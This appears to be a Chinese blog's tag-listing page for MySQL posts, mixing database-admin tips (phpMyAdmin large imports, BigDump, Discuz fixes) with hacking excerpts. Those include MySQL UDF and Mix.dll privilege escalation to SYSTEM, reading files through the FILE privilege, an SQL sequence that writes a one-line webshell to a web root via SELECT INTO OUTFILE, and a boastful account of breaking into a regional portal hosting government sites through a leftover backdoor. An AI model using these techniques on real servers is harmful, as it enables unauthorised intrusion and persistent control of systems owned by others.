浏览模式: 标准 | 列表Tag:mysql

如何在mysql下读取文件

如何在mysql下读取文件?其实思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同......

» 阅读全文

Tags: mysql, getshell

MYSQL之Mix.dll提权

       MYSQL的弱口令可以通过提权拿到系统权限,不过有个前提,就是知道目标主机账号和密码,才能进行提权。不过,WEBSHELL获得了,找mysql账号应该也不是什么难事 ......

» 阅读全文

Tags: mysql

MYSQL之udf.dll提权

一、功能:

利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。

二、适用场合:

1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。

» 阅读全文

Tags: mysql

phpmyadmin无法导入大文件另类解决方案

首先在原来的phpmyadmin中分两步导出mysql数据库:

第一步:导出数据库结构。数据库结构文件一般很小,几乎不可能超过2M,所以可以直接在另外一个phpmyadmin的上面直接恢复;

第二步:导出数据内容。这个文件若是太大,则可以采用cosbeta写的程序进行恢复......

» 阅读全文

Tags: mysql, phpmyadmin

某地区门户网站之沦陷

       话说,此次渗透目标乃是某地区门户网站,该网站下辖数十个企业网站和多个政府网站,由于兴起较早(始于2003年),且有政府背景,所以该网站一直是此地区人气最旺、实力最雄厚的硕果仅存的一家。说起该网站,其实早在上学那会就有念头想拿下,无奈学艺不精,直到去年十一长假才拿到该门户站的权限,但后来大部分webshell都被删了。今天突然心血来潮,想再次安全检测一番,踏着以前的足迹,漏洞都被补上了,但是庆幸的是之前留的后门还有一个没删除,窃喜ing......

       这个故事就是从该webshell开始的......

» 阅读全文

Tags: 435200, mysql, hzhost

巧用BigDump工具导入超大MySQL数据库

       常用的 MySQL 数据库恢复工具(也能进行备份操作)是 phpMyAdmin,这是一个开源、免费的工具,大多数主机商(例如 Hawkhost)都会免费提供 。相信很多站长也用过 phpMyAdmin 来进行网站数据库的备份和恢复,确实很方便,并且有多国语言界面。不过,有一种情况可能你还没碰到,就是当你的数据库体积比较大时,例如 SQL 备份文件大于 2MB,甚至大于 10MB,这个时候如果你通过 phpMyAdmin 来进行数据库的恢复,就会出错,显示如下的提示:

 

» 阅读全文

Tags: bigdump, mysql, 网站

用户需要激活和新注册用户不能自动登陆问题

近日,对某论坛进行改版,发现了一些问题,最终在官网论坛中寻得解决方法,特与君分享......

» 阅读全文

Tags: discuz, mysql

MySQL一句话导出Shell

以前经常看黑手、X或者安全的童鞋应该都知道,利用SQL导出一句话,具体命令大致如下:

SQL代码
  1. Drop TABLE IF EXISTS temp; //如果存在temp表就删掉         
  2. Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段         
  3. Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表         
  4. Select cmd from temp into out file 'D:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入eval.php       
  5. Drop TABLE IF EXISTS temp; //删除temp   

» 阅读全文

Tags: webshell, mysql